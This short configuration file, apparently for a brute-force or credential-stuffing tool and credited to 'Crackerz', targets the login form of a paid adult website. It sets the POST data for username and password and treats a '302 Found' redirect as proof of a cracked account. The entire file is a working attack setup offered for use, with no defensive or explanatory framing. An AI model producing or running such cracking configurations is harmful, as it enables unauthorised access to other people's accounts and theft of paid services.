[Details]
Title=HDPornPass
Author=Crackerz
Version=1.0.3
ConnectionCount=1
CrackedString=302 Found
InvalidString=200 OK|Your Membership Information is invalid or missing
[Connection_1]
Host=www.hdpornpass.com
URL=/login/
PostData=username=[user]&password=[pass]&submit=Sign+In+%3E%3E
IsLogin=1
Method=1
ParseCount=